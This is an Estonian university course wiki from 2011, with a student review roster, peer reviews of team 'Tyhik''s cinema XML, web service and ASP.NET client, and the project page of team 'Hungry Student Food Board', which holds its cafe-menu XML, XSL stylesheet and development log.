** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Priit Siimo=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22Tyhik%22]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond_%22Hungry_Student_Food_Board%22]]

=Siim Sarv=
* Meeskond [[Meeskond "C terav"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenusele [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus projektile kokkuvõtvalt

=Reigo Männiste=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Karl Männil=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "H2"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Ilmar Telga=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus projektile kokkuvõtvalt

=Siim Aaver=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "H2"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Taavi Ilves=
* Meeskond [[Meeskond "Hungry_Student_Food_Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele [[Talk:Meeskond_"Tyhik"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jaan Kruusma=
* Meeskond [[Meeskond "Hungry_Student_Food_Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Andrus Reedla=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jaak Lehtsalu=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "H2"]]
** Arvustus projektile kokkuvõtvalt

=Jana Mrots=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "H2"]]
** Arvustus projektile kokkuvõtvalt

=Heiki Tamm=
* Meeskond [[Meeskond "H2"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Meeskond"]]
** Arvustus XML failile [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Toomas Soha=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele [[Talk:Meeskond_%22Tyhik%22]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22C_terav%22]]
** Arvustus projektile kokkuvõtvalt

=Miina Sikk=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Rauno Rüga=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]
** Arvustus projektile kokkuvõtvalt [[Talk:Meeskond "Tyhik"]]

=Tanel Liiv=
* Meeskond [[Meeskond "Hungry Student Food Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tyhik"]]
** Arvustus projektile kokkuvõtvalt

=Gaspar Karm=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenusele [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "FoodWars"]]
** Arvustus projektile kokkuvõtvalt

=Joosep Ilves=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "H2"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_"FoodWars"]]
** Arvustus projektile kokkuvõtvalt

=Taivo Türnpu=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Sander Baikov=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Allar Anijago=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tool"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Madis Sarv=
* Meeskond [[Meeskond "C terav"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_Tool]]
** Arvustus projektile kokkuvõtvalt

=Kaspar Kallasmaa=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jarko Kaskmaa=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond_%22H2%22]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond_%22H2%22]]
** Arvustus projektile kokkuvõtvalt

=Indrek Kõue=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Erik Kaju=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond ""]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Mailis Toompuu=
* Meeskond [[Meeskond "H2"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Sepad"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Madis Kõosaar=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Sepad"]]
** Arvustus projektile kokkuvõtvalt

=Gert Glükmann=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Martin Lensment=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond_"FoodWars"]] ja [[Talk:Meeskond_Tool]]
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Madis Sildaru=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond_Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Tyhik"]]
** Arvustus projektile kokkuvõtvalt

Talk:Meeskond "Tyhik"

2011-06-05T21:28:25Z

Tliiv: /* Arvustus veebiteenuse klientidele */

<pre>
Arvustus

Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis
<kinod>
<kino>
...
ning
<filmid>
<film>
...
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.
Lehe esialgne kujundus on hea, mulle meeldib.
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.

Indrek Tamm, meeskond Tool, 4.III.2011
</pre>

Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.

Siim Aaver, D21

Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.

Jaak Lehtsalu D22

XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.

Reigo Männiste D22

Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.

Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.

Jarko Kaskmaa D21

<pre>
Teenuse arvamus

Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele
saaks ehitada ühe korraliku ja kasuliku rakenduse.
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.
Aga samas, see on minu arvamus. Edu!

Taavi Ilves D21

----

Vastus:

Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte.
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks "true", siis pistetakse
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.

Aga täname arvamuse eest :)

Kert Suvi D22

</pre>

Teenuse arvustus

Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel "anna*" ja "võta*", kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku ''mergeda'', näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)

-Tanel Liiv D22

Teenuse arvustus

Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.

Siim Aaver D21

----

Vastus:

Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult "AnnaTeenus"-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.

Aga täname arvamuse eest :)

Kert Suvi D22

Teenuse arvustus

Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud "estenglish" kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.

Toomas Soha D21

==Arvustus veebiteenuse klientidele==

Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;)

Madis Sildaru D32

Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++'sis siis, virisen peaasjalikult sortsu kallal :)
*Sorts on eesti keeles :/
*Int32.Parse(Request.QueryString["id"]); stiilis asjad peaks olema try-catch ploki sees.
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta.
*Kinokava.aspx.cs: treppimine on vale
*Response.Redirect("Kinokava.aspx?id=" + id + "&paev=" + paev + "&kuu=" + kuu + "&aasta=" + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.
*Kommentaarid puuduvad koodis.

Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)

Tanel Liiv D22

===Veebiteenuse arvustus===

Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.

Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):

Vähegi suurema projekti puhul ei kasutaks linq't, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks.
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).

Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte.
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.

PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga...
ei saa öelda, et ma just palju kommentaare oleks leidnud :)

Priit Siimo

===Kokkuvõttev arvustus===

Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.

XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.

Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.

Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !

Rauno Rüga, D21

[[User:Rruga|Rruga]]

Talk:Meeskond "Tyhik"

2011-06-05T21:01:49Z

Tliiv: /* Klientrakenduse arvustus */

Talk:Meeskond "Tyhik"

2011-06-05T21:00:29Z

Tliiv:

Meeskond "Hungry Student Food Board"

2011-06-05T20:46:44Z

Tliiv: /* Meeskond */

==Repositooriumi aadress==
*http://svn3.xp-dev.com/svn/nomnom/HSFB/
*Versiooni haldus tarkvara - AnkhSVN või TurtoiseSVN

==Ülesande püstitus==

* XML fail
o XML fail, stiilifail ja skeemifail peavad olema valmis ja wikilehel kirjeldatud hiljemalt 27. veebruar 2011.
o Arvamused XML-failide kohta peavad tehtud olema 4. märts 2011

* Veebiteenus
o Veebiteenus peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.
o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011
o Veebiteenus tuleb esitleda!

* Klientrakendused
o Klientrakendused peavad olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.
o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011
o Klientrakendused tuleb esitleda!

* Meeskonna kokkuvõttev aruanne
o Meeskonnatöö kokkuvõttev aruanne peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 8.mai 2011
o Arvamused Meeskonnatöö kokkuvõtva aruande ja esitluse kohta tuleb esitada hiljemalt päev enne eksamit
o Meeskonna kokkuvõttev aruanne ja töö lõplik tulemus tuleb esitleda!

==Meeskond==
*Jaan Kruusma - projektijuht, analüüs
*Taavi Ilves - arendus, veebiteenus, facebook api
*Tanel Liiv - arendus, veebiteenus
*Indrek Kruuser - arendus, klientrakendus
*Hannes Karask - arendus, adminniliides, klientrakendus

'''Punktid jagatakse võrdselt'''

==Idee==
Idee on luua kohviku menüü haldamise tarkvara. Kasutajal ehk kohvikul on võimalus interneti teel kirjeldada müüki minevad tooted ning tooteid kuvatakse kohvikutes LCD display pealt kui ka Facebooki kaudu kõikide kohvikute menüüsi jälgida. Me lähtume KISS põhimõttest ja hoiame info võimalikult konkreetsena, et kasutaja ei peaks pool päeva toite sisestama või pidevalt kogust arvestama.

==Planeering==
* Veebiteenuse ehitame IronPythoniga .Net frameworki peale.
* Arenduskeskond on Visual Studio 2010, millel on IronPython liides.
* Andmebaasina kasutame MySQL'i, see on kiire ja lihtne üles seada.
* Kliendipoolse lahenduse teeme Asp.Net'i aines kõrval projektina.
* Kõik mis kuvatakse kasutajale ehk kohviku kylastajale teeme HTMLi ja JavaScriptiga
* Andmemudeli diagrammi koostame programmiga QSEE Superlite.

==Veebiteenus==
*IronPythoni kasutus osutus vaevaliseks, asendasime selle C sharpiga.
**MVC3 raamistik
**Razor view engine mugavamaks kirjutamiseks
**MSSQL 2008 R2 andmebaasi mootoriks
**Andmete vahekiht LINQ To Entities

*Tagastab kohviku menüü veebiteenuse ID järgi
*Klienditeenus genereerib igale kohvikule ID
*auth meetod
**tuvastatkse kasutaja
**päring kohviku andmetele

*api meetod
**auth vastusest kuvab kohviku menüü
**Päeva menüü xml kujul

*Statistika korjamine
**Kohviku, meetodi ning IP põhine
***Võimaldab näha statistikat kasutaja ja kohviku lõikes
***Võimaldab näha koormust meetodi põhiselt
**Minimaalne täpsus üks tund
***Et andmemahud ei kasvaks üle pea
***Et oleks võimalik koormust hinnata kellaajaliselt
*[[File:HSFBstats.png]]

===Toodete kuvamine===
[[File:HSFBVeebiteenus.png]]

==Andmediagramm==

[[File:HSFB.png]]

==Desktop Rakendus==
*Töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4
[[File:HFt66.png]]

==Facebook Api==
*Toitude hääletamine reaalajas
[[File:HSFBapi.jpg]]

== XML Fail ==
Highlighted: http://sprunge.us/DPIe?xml

<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet type="text/xsl" href="default.xsl"?>
<kohvikud xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="kohvikud.xsd">
<kohvik name="IT KOHVIK" staatus="Nummisi pannkooke saadaval">
<toit tyyp="praad">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt.jpg</url>
</pilt>
<pealkiri>kanapraad</pealkiri>
<kirjeldus>sinihallitus sokiga</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">100</poolhind>
<tervehind valuuta="eur" rate="1.0000">200</tervehind>
<allahindlus>50%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>34</liked>
</toit>
<toit tyyp="supp">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt2.jpg</url>
</pilt>
<pealkiri>õunasupp</pealkiri>
<kirjeldus>koorega</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">50</poolhind>
<tervehind valuuta="eur" rate="1.0000">120</tervehind>
<allahindlus>10%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>33</liked>
</toit>
</kohvik>
<kohvik name="TTY KOHVIK" staatus="Parim koht">
<toit tyyp="praad">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt2.jpg</url>
</pilt>
<pealkiri>seapraad</pealkiri>
<kirjeldus>seentega</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">200</poolhind>
<tervehind valuuta="eur" rate="1.0000">420</tervehind>
<allahindlus>10%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>2</liked>
</toit>
</kohvik>
</kohvikud>

== XSL ==

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">
<html>
<body>
<h2>Kohvikud</h2>
<table border="1">
<tr bgcolor="#9acd32">
<th>Nimi</th>
<th>Staatus</th>
<th>Menüü</th>
</tr>
<xsl:for-each select="kohvikud/kohvik">
<tr>
<td valign="top"><xsl:value-of select="@name"/></td>
<td valign="top"><xsl:value-of select="@staatus"/></td>
<td valign="top">
<table border="1">
<tr bgcolor="#2acd32">
<td>Pealkiri</td>
<td>Väike portsjon</td>
<td>Täis portsjon</td>
<td>Soodustus</td>
<td>Kehtib</td>
<td>Kirjeldus</td>
<td>Laike</td>
<td>Pildid</td>
</tr>
<xsl:for-each select="./toit">
<tr>
<td><xsl:value-of select="pealkiri"/></td>
<td><xsl:value-of select="poolhind"/></td>
<td><xsl:value-of select="tervehind"/></td>
<td><xsl:value-of select="allahindlus"/></td>
<td><xsl:value-of select="kehtib"/></td>
<td><xsl:value-of select="kirjeldus"/></td>
<td><xsl:value-of select="liked"/></td>
<td>
<xsl:for-each select="./pilt">
<xsl:value-of select="url"/>
</xsl:for-each>
</td>
</tr>
</xsl:for-each>
</table>
</td>
</tr>
</xsl:for-each>
</table>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

== ASP.Net aine raames adminni sisuhaldus ==

'''Nagu eelpool mainitud, kasutame MVC3 raamistikku, andmeid liigutab LINQ to entities.'''

'''Kasutajal tuleb autentida, selleks on aspi enda membership lahendus.'''

[[File:HFSB_login.png]]

'''Menüüde halduse esileht'''

[[File:HFSB_front.png]]

'''Kohvikute vaade, üldadmin näeb kõiki kohvikuid, tavaadmin ainult temaga seostatud kohvikuid'''

[[File:HFSB_cafes_front.png]]

'''Igal kohvikul on enda tooted..'''

[[File:HFSB_tooted_front.png]]

'''..mille sisestamine näeb välja selline:'''

[[File:HFSB_edit_product.png]]

'''Tooteid saab luua, kustutada ja välja lülitada (viimane toimub ajaxiga).

Tootel on küljes kehtivus kuupäev, vastavalt millele genereeritakse menüü. Menüüs on iga päeva peal toode, mis sel päeval kehtib.
'''

[[File:HFSB_menufilter.png]]

== Logi ==
=== 16. Mai ===
Finaalesitlus

=== 13. Mai ===
Ebaõnne päev ja lõpusirge arendus!

=== 6. Mai ===
Desktopvaate analüüs
töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4

=== 29. Aprill ===
Veebiteenuse parendamine

=== 22. Aprill ===
Konkurendiga koostöö lepingu sõlmimine, koodivahetus.

=== 18. Aprill ===
Teenuse presentatsioon, karm tagasiside ehk esimese testimis tulemuste analüüs ja iteratiivse arenguga jätkamine

=== 15-17. Aprill ===
Veebiteenuse lõpu sprint
Andmebaasi lisatud tabel, mis korjab statistikat

=== 8. Aprill ===
Arendus Sprint
*määramatusest tulenevad probleemid
*vaate toorik
*versiooni halduse

=== 4. Aprill ===
Alamprojekt baasitäitmiseks

=== 18. Märts ===
Andmebaasi lihvimine, teenuse toorik.
Projektijuht 2 nädalat komandeeringus, arenduse koordinaator sinisel lehel.

=== 15. Märts ===
Töötav andmebaas, metsikud vaevad versioonihaldusega.
=== 7. Märts ===
Rühmatöö ettevalmistused ja ümberkorraldused: MVC3 (Razor view engine) ja MSSQL SERVER 2008 R2 asendamine. Versioonihalduseks Mercurial HG.
=== 1. Märts ===
Andmediagrammi esialgsed kavandid, et sobiks xmliga kokku.

=== 23. Veebruar ===
Tekkisid määramatusest tulenevad probleemid, haigestumine ja riigipühad.
Xml ja Xsl valmis, Schema vajab täiendusi.

=== 17. Veebruar ===
Projekti kavand pandi paika ja jaotati esialgsed töö ülesanded.
Esialgse Xml'i draft, endiselt arenduses.

=== 16. Veebruar ===
Drastilised muudatused arendus tööriistade valikul. Põhi osa programmist luuakse Pythoniga .NET raamistikus, aga kliendi liides tehakse ikkagi asp.net'iga.

=== 14. Veebruar ===
Meeskonna nime valik ja wiki lehe alustamine.

=== 7. Veebruar ===
Arendus vahenditega tutvumine, kuidas teha, mida teha. Palju metadata kogumist.

=== 2. Veebruar ===
Uue meeskonna moodustamine ja idee kujunemine

[[Category: Võrgurakendused II: hajussüsteemide ehitamine]]
[[Category: Veebirakenduste loomine ASP.NET abil]]

Meeskond "Hungry Student Food Board"

2011-06-05T20:46:32Z

Tliiv:

==Repositooriumi aadress==
*http://svn3.xp-dev.com/svn/nomnom/HSFB/
*Versiooni haldus tarkvara - AnkhSVN või TurtoiseSVN

==Ülesande püstitus==

* XML fail
o XML fail, stiilifail ja skeemifail peavad olema valmis ja wikilehel kirjeldatud hiljemalt 27. veebruar 2011.
o Arvamused XML-failide kohta peavad tehtud olema 4. märts 2011

* Veebiteenus
o Veebiteenus peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.
o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011
o Veebiteenus tuleb esitleda!

* Klientrakendused
o Klientrakendused peavad olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 10. aprill 2011.
o Arvamused veebiteenuste kohta peavad tehtud olema 17. aprill 2011
o Klientrakendused tuleb esitleda!

* Meeskonna kokkuvõttev aruanne
o Meeskonnatöö kokkuvõttev aruanne peab olema valmis, esitatud ja ja wikilehel kirjeldatud hiljemalt 8.mai 2011
o Arvamused Meeskonnatöö kokkuvõtva aruande ja esitluse kohta tuleb esitada hiljemalt päev enne eksamit
o Meeskonna kokkuvõttev aruanne ja töö lõplik tulemus tuleb esitleda!

==Meeskond==
*Jaan Kruusma - projektijuht, analüüs
*Taavi Ilves - arendus, veebiteenus, facebook api
*Tanel Liiv - arendus, veebiteenus
*Indrek Kruuser - arendus, klientrakendus
*Hannes Karask - arendus, adminniliides, klientrakendus

*Punktid jagatakse võrdselt*

==Idee==
Idee on luua kohviku menüü haldamise tarkvara. Kasutajal ehk kohvikul on võimalus interneti teel kirjeldada müüki minevad tooted ning tooteid kuvatakse kohvikutes LCD display pealt kui ka Facebooki kaudu kõikide kohvikute menüüsi jälgida. Me lähtume KISS põhimõttest ja hoiame info võimalikult konkreetsena, et kasutaja ei peaks pool päeva toite sisestama või pidevalt kogust arvestama.

==Planeering==
* Veebiteenuse ehitame IronPythoniga .Net frameworki peale.
* Arenduskeskond on Visual Studio 2010, millel on IronPython liides.
* Andmebaasina kasutame MySQL'i, see on kiire ja lihtne üles seada.
* Kliendipoolse lahenduse teeme Asp.Net'i aines kõrval projektina.
* Kõik mis kuvatakse kasutajale ehk kohviku kylastajale teeme HTMLi ja JavaScriptiga
* Andmemudeli diagrammi koostame programmiga QSEE Superlite.

==Veebiteenus==
*IronPythoni kasutus osutus vaevaliseks, asendasime selle C sharpiga.
